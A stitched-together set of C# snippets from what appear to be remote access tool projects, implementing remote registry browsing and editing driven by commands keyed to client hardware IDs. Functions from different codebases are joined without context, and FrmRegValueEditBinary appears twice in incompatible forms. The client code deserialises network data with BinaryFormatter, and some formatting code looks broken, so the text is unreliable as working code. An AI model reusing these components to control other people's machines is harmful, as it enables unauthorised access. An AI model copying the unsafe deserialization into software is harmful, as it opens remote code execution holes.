private string RegistryValueToString(RegValueData value)
{
switch (value.Kind)
{
case RegistryValueKind.Binary:
return(value.Data.Length > 0 ? BitConverter.ToString(value.Data).Replace("-", " ").ToLower() : "(zero-length binary value)");
case RegistryValueKind.MultiString:
return(string.Join(" ", ByteConverter.ToStringArray(value.Data)));
case RegistryValueKind.DWord: // show hexadecimal and decimal
return($"0x{value.Data:x8} ({ByteConverter.ToUInt32(value.Data).ToString()})");
case RegistryValueKind.QWord: // show hexadecimal and decimal
return($"0x{value.Data:x8} ({ByteConverter.ToUInt64(value.Data).ToString()})");
case RegistryValueKind.String:
case RegistryValueKind.ExpandString:
return(ByteConverter.ToString(value.Data));
default:
return(string.Empty);
}
}
private void CreateValue(object sender, string keyPath, RegValueData value)
{
TreeNode key = GetTreeNode(keyPath);
if (key != null)
{
List <RegValueData> valuesFromNode = ((RegValueData[])key.Tag).ToList();
valuesFromNode.Add(value);
key.Tag = valuesFromNode.ToArray();
if (tvRegistryDirectory.SelectedNode == key)
{
RegistryValueLstItem item = new RegistryValueLstItem(value);
lstRegistryValues.Items.Add(item);
//Unselect all
lstRegistryValues.SelectedIndices.Clear();
item.Selected = true;
lstRegistryValues.LabelEdit = true;
item.BeginEdit();
}
tvRegistryDirectory.SelectedNode = key;
}
}
public FrmRegValueEditBinary(string keyPath, RegValueData value, Client c)
{
_connectClient = c;
_keyPath = keyPath;
_value = value;
InitializeComponent();
this.valueNameTxtBox.Text = value.Name;
if (value.Kind == Microsoft.Win32.RegistryValueKind.Binary)
{
hexEditor.HexTable = (byte[])value.Data;
}
else if (value.Kind == Microsoft.Win32.RegistryValueKind.DWord)
{
hexEditor.HexTable = BitConverter.GetBytes((uint)(int)value.Data);
}
else if (value.Kind == Microsoft.Win32.RegistryValueKind.QWord)
{
hexEditor.HexTable = BitConverter.GetBytes((ulong)(long)value.Data);
}
else if (value.Kind == Microsoft.Win32.RegistryValueKind.String || value.Kind == Microsoft.Win32.RegistryValueKind.ExpandString)
{
//Convert string to bytes
byte[] bytes = new byte[value.Data.ToString().Length *sizeof(char)];
Buffer.BlockCopy(value.Data.ToString().ToCharArray(), 0, bytes, 0, bytes.Length);
hexEditor.HexTable = bytes;
}
else if (value.Kind == Microsoft.Win32.RegistryValueKind.MultiString)
{
byte[] bytes = MultiStringToBytes((string[])value.Data);
hexEditor.HexTable = bytes;
}
}
public DoChangeRegistryValue(string keyPath, RegValueData value)
{
KeyPath = keyPath;
Value = value;
}
public RegistryValueLstItem(RegValueData value)
{
RegName = value.Name;
Type = value.Kind.RegistryTypeToString();
Data = RegValueHelper.RegistryValueToString(value);
}
public void RegManager(Clients client, MsgPack unpack_msgpack)
{
try
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "setClient":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
if (FM.Client == null)
{
client.ID = unpack_msgpack.ForcePathObject("Hwid").AsString;
FM.Client = client;
FM.timer1.Enabled = true;
}
}
break;
}
case "CreateKey":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
byte[] Matchbyte = unpack_msgpack.ForcePathObject("Match").GetAsBytes();
FM.CreateNewKey(ParentPath, DeSerializeMatch(Matchbyte));
}
break;
}
case "LoadKey":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
string rootKey = unpack_msgpack.ForcePathObject("RootKey").AsString;
byte[] Matchesbyte = unpack_msgpack.ForcePathObject("Matches").GetAsBytes();
FM.AddKeys(rootKey, DeSerializeMatches(Matchesbyte));
}
break;
}
case "DeleteKey":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
string rootKey = unpack_msgpack.ForcePathObject("ParentPath").AsString;
string subkey = unpack_msgpack.ForcePathObject("KeyName").AsString;
FM.DeleteKey(rootKey, subkey);
}
break;
}
case "RenameKey":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
string rootKey = unpack_msgpack.ForcePathObject("rootKey").AsString;
string oldName = unpack_msgpack.ForcePathObject("oldName").AsString;
string newName = unpack_msgpack.ForcePathObject("newName").AsString;
FM.RenameKey(rootKey, oldName, newName);
}
break;
}
case "CreateValue":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
string keyPath = unpack_msgpack.ForcePathObject("keyPath").AsString;
string Kindstring = unpack_msgpack.ForcePathObject("Kindstring").AsString;
string newKeyName = unpack_msgpack.ForcePathObject("newKeyName").AsString;
RegistryValueKind Kind = RegistryValueKind.None;
switch (Kindstring)
{
case "-1":
{
Kind = RegistryValueKind.None;
break;
}
case "0":
{
Kind = RegistryValueKind.Unknown;
break;
}
case "1":
{
Kind = RegistryValueKind.String;
break;
}
case "2":
{
Kind = RegistryValueKind.ExpandString;
break;
}
case "3":
{
Kind = RegistryValueKind.Binary;
break;
}
case "4":
{
Kind = RegistryValueKind.DWord;
break;
}
case "7":
{
Kind = RegistryValueKind.MultiString;
break;
}
case "11":
{
Kind = RegistryValueKind.QWord;
break;
}
}
RegValueData regValueData = new RegValueData();
regValueData.Name = newKeyName;
regValueData.Kind = Kind;
regValueData.Data = new byte[] { };
FM.CreateValue(keyPath, regValueData);
}
break;
}
case "DeleteValue":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
string keyPath = unpack_msgpack.ForcePathObject("keyPath").AsString;
string ValueName = unpack_msgpack.ForcePathObject("ValueName").AsString;
FM.DeleteValue(keyPath, ValueName);
}
break;
}
case "RenameValue":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
string keyPath = unpack_msgpack.ForcePathObject("keyPath").AsString;
string OldValueName = unpack_msgpack.ForcePathObject("OldValueName").AsString;
string NewValueName = unpack_msgpack.ForcePathObject("NewValueName").AsString;
FM.RenameValue(keyPath, OldValueName, NewValueName);
}
break;
}
case "ChangeValue":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
string keyPath = unpack_msgpack.ForcePathObject("keyPath").AsString;
byte[] RegValueDatabyte = unpack_msgpack.ForcePathObject("Value").GetAsBytes();
FM.ChangeValue(keyPath, DeSerializeRegValueData(RegValueDatabyte));
}
break;
}
}
}
catch { }
}
private void OnValueChangedEventHandler(RegistryEditorAdapterHandler adapterHandler, string keyPath, RegValueData value)
{
TreeNode key = GetTreeNode(keyPath);
if (key != null)
{
var regValue = ((RegValueData[])key.Tag).First(item => item.Name == value.Name);
ChangeRegistryValue(value, regValue);
if (tvRegistryDirectory.SelectedNode == key)
{
var valueItem = lstRegistryValues.Items.Cast <RegistryValueLstItem>()
.SingleOrDefault(item => item.Name == value.Name);
if (valueItem != null)
{
valueItem.Data = RegValueHelper.RegistryValueToString(value);
}
}
tvRegistryDirectory.SelectedNode = key;
}
}
public FrmRegValueEditBinary(string keyPath, RegValueData value, ClientMosaique c)
{
string[] convertToStrArr = null;
byte[] byteRewrited = null;
_connectClient = c;
_keyPath = keyPath;
_value = value;
InitializeComponent();
this.valueNameTxtBox.Text = RegValueHelper.GetName(value.Name);
if (value.Data == null)
{
hexEditor.HexTable = new byte[] { };
}
else
{
if (value.Kind == RegistryValueKind.Binary)
{
var serializer = new JavaScriptSerializer();
var result = serializer.DeserializeObject(value.Data);
object[] convertToObjectArray = (Object[])result;
byteRewrited = new byte[convertToObjectArray.Length];
int i = 0;
foreach (object obj in convertToObjectArray)
{
byteRewrited[i] = byte.Parse(obj.ToString());
i++;
}
}
if (value.Kind == RegistryValueKind.MultiString)
{
var serializer = new JavaScriptSerializer();
var result = serializer.DeserializeObject(value.Data);
var objVal = (Object[])result;
convertToStrArr = new string[objVal.Length];
int i = 0;
foreach (object obj in objVal)
{
convertToStrArr[i] = obj.ToString();
i++;
}
}
switch (value.Kind)
{
case RegistryValueKind.Binary:
hexEditor.HexTable = (byte[])byteRewrited;
break;
case RegistryValueKind.DWord:
try
{
var serializer = new JavaScriptSerializer();
var result = serializer.DeserializeObject(value.Data);
hexEditor.HexTable = ByteConverter.GetBytes((uint)(int)result);
}catch { }
break;
case RegistryValueKind.QWord:
hexEditor.HexTable = ByteConverter.GetBytes((ulong)(long.Parse(value.Data.ToString())));
break;
case RegistryValueKind.MultiString:
hexEditor.HexTable = ByteConverter.GetBytes((string[])convertToStrArr);
break;
case RegistryValueKind.String:
case RegistryValueKind.ExpandString:
hexEditor.HexTable = ByteConverter.GetBytes(value.Data);
break;
}
}
}
public RegManager(MsgPack unpack_msgpack)
{
try
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "LoadRegistryKey":
{
string RootKeyName = unpack_msgpack.ForcePathObject("RootKeyName").AsString;
LoadKey(RootKeyName);
break;
}
case "CreateRegistryKey":
{
string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
CreateKey(ParentPath);
break;
}
case "DeleteRegistryKey":
{
string KeyName = unpack_msgpack.ForcePathObject("KeyName").AsString;
string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
DeleteKey(KeyName, ParentPath);
break;
}
case "RenameRegistryKey":
{
string OldKeyName = unpack_msgpack.ForcePathObject("OldKeyName").AsString;
string NewKeyName = unpack_msgpack.ForcePathObject("NewKeyName").AsString;
string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
RenameKey(OldKeyName, NewKeyName, ParentPath);
break;
}
case "CreateRegistryValue":
{
string KeyPath = unpack_msgpack.ForcePathObject("KeyPath").AsString;
string Kindstring = unpack_msgpack.ForcePathObject("Kindstring").AsString;
CreateValue(KeyPath, Kindstring);
break;
}
case "DeleteRegistryValue":
{
string KeyPath = unpack_msgpack.ForcePathObject("KeyPath").AsString;
string ValueName = unpack_msgpack.ForcePathObject("ValueName").AsString;
DeleteValue(KeyPath, ValueName);
break;
}
case "RenameRegistryValue":
{
string OldValueName = unpack_msgpack.ForcePathObject("OldValueName").AsString;
string NewValueName = unpack_msgpack.ForcePathObject("NewValueName").AsString;
string KeyPath = unpack_msgpack.ForcePathObject("KeyPath").AsString;
RenameValue(OldValueName, NewValueName, KeyPath);
break;
}
case "ChangeRegistryValue":
{
byte[] Valuebyte = unpack_msgpack.ForcePathObject("Value").GetAsBytes();
BinaryFormatter formatter = new BinaryFormatter();
MemoryStream mStream = new MemoryStream();
mStream.Write(Valuebyte, 0, Valuebyte.Length);
mStream.Flush();
mStream.Seek(0, SeekOrigin.Begin);
RegValueData Value = (RegValueData)formatter.Deserialize(mStream);
ChangeValue(Value, unpack_msgpack.ForcePathObject("KeyPath").AsString);
break;
}
}
}
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
Packet.Error(ex.Message);
}
}